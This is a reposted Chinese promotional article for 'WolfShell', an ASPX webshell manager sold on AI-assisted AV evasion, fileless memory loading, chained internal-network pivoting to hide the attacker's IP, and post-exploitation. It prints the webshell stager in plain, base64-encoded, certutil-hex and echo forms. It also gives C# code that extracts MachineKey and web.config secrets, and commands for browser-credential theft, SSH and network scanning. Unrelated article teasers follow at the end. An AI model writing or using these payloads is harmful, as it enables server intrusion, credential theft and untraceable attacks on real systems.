首款支持AI渗透的WebShell管理工具,聊个天就能实现免杀|实现高隐蔽内网渗透

news2026/3/28 6:23:58
0x01 工具介绍金刚狼首款支持 AI 渗透的 WebShell MCP也是一款支持多层内网级联的 ASPX、ASHX 高级 WebShell 管理工具。工具采用 AES 加密通信无需代理即可实现内网穿透支持内存加载各类渗透工具做到无文件落地隐蔽渗透目标。同时具备动态代码执行、ShellCode 加载、反弹 Shell、Socks 代理、内存马注入等能力聊天即可实现免杀极大提升渗透隐蔽性与后渗透能力适用于高对抗环境下的内网安全测试与横向移动作业。注意现在只对常读和星标的公众号才展示大图推送建议大家把渗透安全HackTwo设为星标⭐️否则可能就看不到了啦下载地址在末尾 #渗透安全HackTwo0x02 功能介绍✨主要功能自定义.NET程序执行.NET程序执行 支持内存加载执行自定义.NET程序集快速扩展后渗透能力。AI人工智能使用AI兔杀金刚狼 WebShell 服务端级联内网第3层WebShell 执行Cmd命令通过入口点 192.168.50.106 级联内网 192.168.50.159 再次级联下一层内网 192.168.50.69 WebShell 执行命令PS: 当然也可级联外网比如抓了一些服务器当跳板真正要搞的目标在第3层这样就很难被追踪或溯源到你的真实IP了级联内网第2层WebShell 执行Cmd命令通过入口点 192.168.50.159 级联内网 192.168.50.106 WebShell执行命令WebShell入口点 执行Cmd命WebShell入口点 执行PowerShell命令/代码whoami代码实现非系统whoami支持命令执行、代码执行 长度9K输入info、ver可查看操作系统版本、位数、.NET版本、PowerShell版本信息输入whoami、username可自动转成对应powershell代码查看用户信息Base64加密代码执行 示例 base64:ZWNobyBXb2xmU2hlbGwPS C:\Users\adminwhoamiwhoami: IIS APPPOOL\DefaultAppPoolUsername: WIN-021V7TK43N5$PS C:\Users\admininfoOperating System Version: Microsoft Windows Server 2019 Datacenter 64 bitVersion Number: 10.0.17763PowerShell Version:5.1.17763.1.NET Detailed Versions:PSChildName Version Release----------- ------- -------Client 4.7.03190 461814PS C:\Users\adminbase64:ZWNobyBXb2xmU2hlbGwWolfShellPS C:\Users\adminWrite-Host Current User:n$env:USERNAMECurrent User:WIN-021V7TK43N5$文件管理 核心优势支持AI渗透支持使用自然语言指挥AI操作WebShell执行命令进行渗透。AI免杀接入AI人工智能聊个天就能免杀WebShell。高效隐蔽的通信 采用 二进制流 传输协议确保通信的高效性与隐蔽性。端到端安全加密 所有传输 Payload 均经过 AES加密 保护且每次通信使用 随机密钥保障数据安全。无痕运行 支持直接在 内存中加载并执行代码最大程度避免在磁盘留下痕迹显著提升操作隐蔽性和安全性。内网级联WebShell控制 通过现有已控的WebShell无需部署代理或配置端口转发即可连接控制更深层内网环境中的WebShell。Hacking后渗透通过已控的 WebShell 在内存中加载渗透工具无需部署代理或配置端口转发即可实现便捷高效的内网横向渗透。语言特征: 服务端(webshell)及payload均为纯英文只有提供的WebShell变种文件包含英文、日文、韩文。0x03 更新介绍内置Web网站探测内存加载 EXE扫描器内置Port端口扫描内存加载 EXE扫描器内置PJL协议探测打印机内存加载 EXE扫描器内置SNMP探测网络设备0x04 使用介绍安装指南下载WolfShell配置环境确保目标环境支持ASPX、ASHX并已正确配置。上传WolfShell将WolfShell文件上传到目标服务器支持ASPX、ASHX、内存马3种类型。WebShell脚本: shell访问WebShell通过工具客户端连接WebShell默认密码 WolfShell修改密码可使用工具上的WolfHash加密。使用环境操作系统windows.NET 版本.NET Framework 4.8命令 | 漏洞 GetShell具备命令执行条件时可通过以下4种方法写入 金刚狼 WebShell#PowerShell写入wolf.aspxpowershell -Command Set-Content -Path wolf.aspx -Value % Page Language\C#\ %%if (Request.Cookies.Count ! 0) { byte[] k Encoding.Default.GetBytes(\ca63457538b9b1e0\); System.IO.Stream s Request.InputStream; byte[] c new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\K\).Equals(this); }%#PowerShell命令 Base64写入wolf.aspxpowershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA#cmd命令 echo certutil 写入wolf.aspxecho 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e w.hex certutil -f -decodehex w.hex wolf.aspx del w.hex#cmd命令 echo 写入wolf.aspxecho ^% Page LanguageC# %^ wolf.aspx echo ^% if (Request.Cookies.Count ! 0) { wolf.aspx echo byte[] k Encoding.Default.GetBytes(ca63457538b9b1e0); wolf.aspx echo System.IO.Stream s Request.InputStream; wolf.aspx echo byte[] c new byte[s.Length]; wolf.aspx echo s.Read(c, 0, c.Length); wolf.aspx echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(K).Equals(this); wolf.aspx echo } %^ wolf.aspxC#代码执行获取 ValidationKey 示例代码ValidationKey提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息usingSystem;usingSystem.Reflection;usingSystem.Web.Configuration;publicclassEval{publicstringeval(Object obj){var sy Assembly.Load(System.Web, Version4.0.0.0, Cultureneutral, PublicKeyTokenb03f5f7f11d50a3a);var mkt sy.GetType(System.Web.Configuration.MachineKeySection);var gac mkt.GetMethod(GetApplicationConfig, BindingFlags.Static | BindingFlags.NonPublic);var cg (MachineKeySection)gac.Invoke(null, newobject[0]);returnValidationKey: cg.ValidationKey | Validation: cg.Validation | DecryptionKey: cg.DecryptionKey | Decryption: cg.Decryption | CompatibilityMode: cg.CompatibilityMode;}}扫描C段存活主机 示例代码using System;using System.Net;using System.Net.NetworkInformation;using System.Text;using System.Threading.Tasks;public class Eval{public string eval(Object obj){StringBuilder iplist new StringBuilder();string baseIP 192.168.1.;PingOptions options new PingOptions();options.DontFragment true;var tasks new Task[254];for (int i 1; i 255; i){int ipSuffix i;tasks[i - 1] Task.Run(() {using (Ping myPing new Ping()){PingReply reply myPing.Send(baseIP ipSuffix, 120);if (reply.Status IPStatus.Success){lock (iplist){iplist.AppendLine(Alive IP: reply.Address.ToString());}}}});}Task.WaitAll(tasks);return iplist.ToString();}}CMD命令执行 示例代码using System;using System.Diagnostics;public class Eval{public string eval(Object obj){try{Process process new Process();process.StartInfo.FileName cmd.exe;process.StartInfo.Arguments /c whoami;process.StartInfo.UseShellExecute false;process.StartInfo.RedirectStandardOutput true;process.Start();string result process.StandardOutput.ReadToEnd();process.WaitForExit();return result;}catch (Exception ex){return Error occurred: ex.Message;}}}获取web.config密码 示例代码web.config读取提取数据库连接信息数据库名、用户、密码、SMTP/邮件服务器用户密码等。using System;using System.Configuration;using System.Text;public class Eval{public string eval(Object obj){try{var connectionStrings ConfigurationManager.ConnectionStrings;var appSettings ConfigurationManager.AppSettings;var result new StringBuilder();foreach (ConnectionStringSettings connectionString in connectionStrings){result.AppendLine(Connection string name: connectionString.Name);result.AppendLine(Connection string value: connectionString.ConnectionString);result.AppendLine();}result.AppendLine();foreach (string key in appSettings.AllKeys){result.AppendLine(Key: key , Value: appSettings[key]);}return result.ToString();}catch (Exception ex){return Error occurred: ex.Message;}}}加密解密算法支持加密算法 BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码 支持解密算法 BASE64、HEX、ASCII、PowerShell、URL编码金刚狼密码Potato提权示例badpotato提权内网扫描示例Hacking后渗透SSH远程命令执行示例Usage:sshcmd 192.168.50.128 22 root toor idsshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rarsshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rarKeybordsshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rarsshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rarMysql数据库连接示例mysqlcmd host port user pass dbname sqlstrmysqlcmd host port user pass dbname sqlb64Demo:mysqlcmd 192.168.50.139 3306 root WolfShell mysql infomysqlcmd 192.168.50.139 3306 root WolfShell mysql SELECT VERSION(); mysqlcmd 192.168.50.139 3306 root WolfShell mysql SELECT 35 mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ;读取浏览器密码示例SharpWeb浏览器凭据抓取工具支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。Usage:SharWeb arg0 [arg1 arg2 ...]Arguments:all - Retrieve all Chrome, FireFox and IE/Edge credentials.full - The same as allchrome - Fetch saved Chrome logins. e.g. -d Directoryfirefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directoryedge - Fetch saved Internet Explorer/Microsoft Edge logins.Demo:SharWeb allSharWeb chromeSharWeb chrome -d C:\OutputSharWeb firefox -p mymasterkey -d C:\OutputSharWeb edgeLadon内网渗透工具示例Usage:Ladon whoamiLadon 192.168.50.159/24 ICMP ICMP存活主机探测Ladon 192.168.50.159/24 PortScan 开放端口服务扫描Ladon 192.168.50.159/24 WebScan 网站标题、中间件Ladon 192.168.50.159/24 SmbInfo SMB存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 NbtInfo NBT存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 WmiInfo WMI存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 LdapInfo LDAP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 RdpInfo RDP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 SmtpInfo SMTP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 HttpInfo HTTP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 WinrmInfo Winrm存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 MssqlInfo SQL数据库主机探测、NTLM系统信息Ladon 192.168.50.159/24 FtpInfo FTP存活主机探测Ladon 192.168.50.159/24 T3Info Weblogic协议探测Ladon 192.168.50.159/24 CiscoInfo Cisco路由器探测Ladon 192.168.50.159/24 SnmpInfo SNMP设备探测如路由器、交换机等Ladon 192.168.50.159/24 OxidInfo Windows多网卡主机探测Ladon 192.168.50.159/24 EthInfo Windows多网卡主机探测Ladon http://0x7556.org WPinfo WordPress版本、插件探测、漏洞Ladon 192.168.50.159/24 DnsInfo DNS存活主机探测、域名识别内存加载 内网扫描器内存加载扫描器只需研发单个IP的.NET程序通过该模块即可变成内存加载的C段扫描器。如只需实现对1个IP的检测、漏洞利用等工具注意类和方法需为 Public自定义工具 原始用法F:\pyurltitle.exe 192.168.50.1URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title远程内存加载 变身 内网C段扫描器使用方法将目标 EXE 拖放到“ExePath”文件路径输入框。在“C 段”输入框中填写要扫描的网段例如 192.168.1.0/24。点击“Scan”按钮开始扫描。扫描行为和结果由所加载的 EXE 功能决定。说明加载器默认先通过 ICMPping探测目标是否存活只有存活的主机才会被加载并执行自定义 EXE。若目标网络禁用 ICMP 响应请取消勾选“先行探测/ICMP”选项以跳过探测步骤。 --下载公众号回复20260326获取下载

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2452389.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…